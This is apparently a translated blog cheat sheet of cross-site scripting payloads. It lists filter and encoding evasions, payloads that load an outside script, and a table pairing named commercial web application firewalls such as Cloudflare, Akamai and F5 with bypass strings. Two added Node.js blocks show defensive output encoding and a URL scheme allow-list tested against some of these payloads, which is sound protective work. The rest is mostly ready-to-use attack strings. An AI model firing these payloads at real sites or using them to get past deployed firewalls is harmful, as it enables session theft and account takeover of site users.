XSS practice notes

Part One: Common construction patterns

1. No filtering; inject directly:
<script>alert(1)</script>

2. Ordinary quote close-out:

"> <script>alert(1)</script>
'> <script>alert(1)</script>

3. Without angle brackets <>:

" onmouseover=alert(1) (followed by a space)
' onmouseover=alert(1) (followed by a space)
' onclick=alert(1) (followed by a space)
" onfocus=alert(1) autofocus="

4. Inline frame injection:
"><iframe src=javascript:alert(1)>

5. Hyperlink injection:
"> <a href="javascript:alert(1)">漏洞</a>

6. When the parentheses in alert(1) are filtered, the backtick (`) is an available substitute; / can also be used.

7. When both () and the backtick are filtered, the following can be used:

- <iframe srcdoc="<script>parent.alert&#40;1&#41;</script>"
- <svg><script>alert&#40;1&#41</script>

8. When comment characters are permitted, they can be used to bypass, e.g. <!-!->

9. The str_replace() function is case-sensitive.

10. When a URL blacklist is in place, encodings such as HTML character references can be used:
javascrip&#x74;:alert(1)
javasc&#x72;ipt:alert'1'

11. The comment symbol (//) and line feed / carriage return characters (%0a / %0d) can be used to bypass various preset restrictions (for example, a rule that a given parameter must not contain a space).

12. External-script XSS:
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

13. IMG tag variants:

<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#x6A&#x61&#x76&#x61(hex-encoded)&#x58&#x53&#x53&#x27&#x29>

14. Embedded characters:

<IMG SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');"> (embedded encoded tab)
<IMG SRC="javascript:alert('XSS');"> (embedded newline) (embedded carriage return)

15. Double opening angle bracket:
<<SCRIPT>alert("XSS");//<</SCRIPT>

16. BODY background image:
<BODY BACKGROUND="javascript:alert('XSS')">

17. IMG DYNSRC:
<IMG DYNSRC="javascript:alert('XSS')">

IMG LOWSRC:
<IMG LOWSRC="javascript:alert('XSS')">

18. DIV background-image:

<DIV STYLE="background-image:url(javascript:alert('XSS'))">

19. JavaScript links:

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

20. embed:
<embed src="javascript:alert(1)">

21. video:
<video onerror="alert(1)">

22. In JavaScript, Unicode escapes (\u) can be used directly in identifiers, and inside a string passed to eval, Unicode, hexadecimal (\x) and octal escapes all work. In addition, a redundant backslash before an ordinary character inside a string is simply ignored.

<script>a\u006cert(1);</script>
<script>eval('a\u006cert(1)');</script>
<script>eval('a\x6cert(1)');</script>
<script>eval('a\154ert(1)');</script>
<script>eval('a\l\ert\(1\)');</script>
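Every pattern in Part One relies on untrusted input reaching a sink where its metacharacters keep their meaning, and the string blacklist that items 3 and 9 defeat only strips a few tokens. As an added example (not from the original notes), a Node.js encoder that escapes for the exact output context, with hypothetical render functions standing in for a server-side template, run over the payloads of items 1 to 3:

```javascript
// Added example (not from the original notes): context-aware output encoding.
// A blacklist such as naiveFilter() is what items 3 and 9 above defeat; encoding
// every metacharacter for the exact output context leaves nothing to break out with.

// HTML text and double-quoted attribute context.
function encodeForHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Unquoted attribute context (item 3): whitespace and "=" also end the value, so
// everything that is not alphanumeric becomes a numeric character reference.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^a-zA-Z0-9]/g, (c) => "&#x" + c.charCodeAt(0).toString(16).toUpperCase() + ";");
}

// The kind of string blacklist these notes assume on the target: strips <script> tags only.
function naiveFilter(s) {
  return String(s).replace(/<\/?script>/gi, "");
}

// Hypothetical render functions standing in for a server-side template.
function renderCommentNaive(input) { return '<p class="comment">' + naiveFilter(input) + "</p>"; }
function renderComment(input)      { return '<p class="comment">' + encodeForHtml(input) + "</p>"; }
function renderValue(input)        { return "<input value=" + encodeForHtmlAttribute(input) + ">"; }

// Constructed inputs copied from items 1, 2 and 3 of the notes.
const PAYLOADS = [
  "<script>alert(1)</script>",
  '"> <script>alert(1)</script>',
  '" onmouseover=alert(1) ',
  '" onfocus=alert(1) autofocus="',
];

function count(str, ch) { return str.split(ch).length - 1; }

// Safe means the input added no markup: the fragment holds exactly the two "<" and
// two ">" the template wrote, and the unquoted value has no whitespace, quote or "=".
function commentIsSafe(render) {
  return PAYLOADS.every((p) => count(render(p), "<") === 2 && count(render(p), ">") === 2);
}
function valueIsSafe() {
  return PAYLOADS.every((p) => !/[\s"'=]/.test(renderValue(p).slice("<input value=".length, -1)));
}

console.log("naive blacklist safe:", commentIsSafe(renderCommentNaive)); // false
console.log("encoded text safe:", commentIsSafe(renderComment));         // true
console.log("encoded attribute safe:", valueIsSafe());                    // true
```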

Part Two: Bypass techniques

1. Double URL encoding
Encode the % of a URL-encoded sequence as %25. If the back end URL-decodes the parameter a second time, or URL-decodes it on output, the WAF is bypassed.

2. Base64 encoding
When the WAF does not block <> but does intercept script and onXXXX handlers, base64 can be used to bypass:

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYmFzZTY0X2lmcmFtZScpPC9zY3JpcHQ+">

3. HTML entity encoding bypass
(1) Explanation: entity encoding is applied so that a character such as a double quote inside attribute data is not treated by the browser as the quote that closes the attribute, which would otherwise terminate it early and break the tag.

payload:

<a href='javascript:alert&#40;&#39;123&#39;&#41;'>hello</a>
<a href="j&#97;vascript:alert&#0000040;'123'&#41;">hello</a>

(2) Note: inside the javascript: pseudo-protocol, the JS code itself cannot use double quotes. Instead, wrap it in an eval() call (eval understands \x hex, octal and \u Unicode escapes):

<a href="j&#97;vascript:eval('&#;\u0091\x65\x72\x74\x28\x22\x31\x22\x29')">hello</a>

(3) If the input is reflected directly into the page, you can HTML-entity-encode it first and then URL-encode it:

<svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>

4. When /script is filtered:

<%2fscript>
<%252fscript>
<%252fScRipt>
<%252fScrIPt%20>
<%252fsCrIpt+ipT%20>

5. When parentheses are filtered
throw can be used to call a function without parentheses:

<a onmouseover="javascript:window.onerror=alert;throw 1">
<img src=x onerror="javascript:window.onerror=alert;throw 1">

6. Null-byte bypass:

<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>

7. Split first, then concatenate:
<script>var a='h';var b=':\/\/';document.write('<script src="'+a+'ttp'+b+'xss.tw/xxx"><\/script>');</script>

8. Bypass via unusual ASCII / byte encoding:

<img/ \/\μ src=x onerror=alert(1)//>
<img src=\x17\x17 onerror=alert(1)//>
<img/\%20src=%17y%17 onerror=%C2%A0alert(1)//>

9. When parentheses and semicolons are filtered
Curly braces can be used to separate statements: put the onerror assignment inside braces, which avoids the need for a semicolon:
<script>{onerror=alert}throw 1337</script>

Part Three: Common WAF bypasses

WAF name: Cloudflare
Payload: <a"/onclick=(confirm)()>click
Bypass technique: non-space padding

WAF name: Wordfence
Payload: <a/href=javascript&colon;alert()>click
Bypass technique: numeric character encoding

WAF name: Barracuda
Payload: <a/href=&#74;ava%0a%0d%09script&colon;alert()>click
Bypass technique: numeric character encoding

WAF name: Akamai
Payload: <d3v/onauxclick=[2].some(confirm)>click
Bypass technique: event handler missing from blacklist, plus function-call obfuscation

WAF name: Comodo
Payload: <d3v/onauxclick=(((confirm)))">click
Bypass technique: event handler missing from blacklist, plus function-call obfuscation

WAF name: F5
Payload: <d3v/onmouseleave=[2].some(confirm)>click
Bypass technique: event handler missing from blacklist, plus function-call obfuscation

WAF name: ModSecurity
Payload: <details/open/ontoggle=alert()>
Bypass technique: tag or event handler missing from blacklist

WAF name: dotdefender
Payload: <details/open/ontoggle=(confirm)()//
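The href payloads in this part and in items 5, 10 and 19 of Part One all get past a plain "javascript:" string match because the scheme is entity-encoded, percent-encoded (including the double encoding of Part Two item 1) or split by tab / newline characters that the browser discards. As an added example (not from the original notes), a Node.js allow-list check that canonicalizes the value before comparing the scheme; the allowed-scheme set and the small named-entity table are assumptions for this example:

```javascript
// Added example (not from the original notes): allow-list the scheme of an href only
// after canonicalizing it the way the browser (and an over-eager server) will, so the
// encoded or whitespace-split "javascript:" forms above cannot slip past a comparison.

// Decode HTML character references: decimal (&#74;), hex (&#x74;) and the few named
// references relevant here; &colon; is the one the WAF payloads use. One pass only,
// matching the HTML parser.
const NAMED = { colon: ":", amp: "&", lt: "<", gt: ">", quot: '"', apos: "'", sol: "/", Tab: "\t", NewLine: "\n" };
function decodeHtmlEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, (m, ref) => {
    if (ref[0] === "#") {
      const code = ref[1].toLowerCase() === "x" ? parseInt(ref.slice(2), 16) : parseInt(ref.slice(1), 10);
      return code <= 0x10ffff ? String.fromCodePoint(code) : m;
    }
    return Object.prototype.hasOwnProperty.call(NAMED, ref) ? NAMED[ref] : m;
  });
}

// Percent-decode until the value stops changing (double encoding, Part Two item 1),
// capped so a pathological input cannot loop; malformed sequences are left alone.
function percentDecodeFully(s, maxRounds = 5) {
  for (let i = 0; i < maxRounds; i++) {
    let d;
    try { d = decodeURIComponent(s); } catch (e) { return s; }
    if (d === s) return s;
    s = d;
  }
  return s;
}

// The URL parser strips leading/trailing C0 controls and spaces and drops ASCII tab,
// LF and CR anywhere, which is why "java%0a%0d%09script" still reaches the scheme.
function canonicalizeUrl(raw) {
  const s = percentDecodeFully(decodeHtmlEntities(String(raw)));
  return s.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "").replace(/[\t\n\r]/g, "");
}

// Assumed policy for this example: only these schemes, plus same-origin relative paths.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);
function isSafeHref(raw) {
  const url = canonicalizeUrl(raw);
  const m = /^([a-z][a-z0-9+.-]*:)/i.exec(url);
  if (!m) return !url.startsWith("//"); // relative path; protocol-relative is rejected
  return ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

console.log(isSafeHref("javascrip&#x74;:alert(1)"));               // false (Part One, item 10)
console.log(isSafeHref("&#74;ava%0a%0d%09script&colon;alert()")); // false (Barracuda row)
console.log(isSafeHref("https://example.com/page?q=1"));         // true
```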


Origin www.cnblogs.com/-mo-/p/11229183.html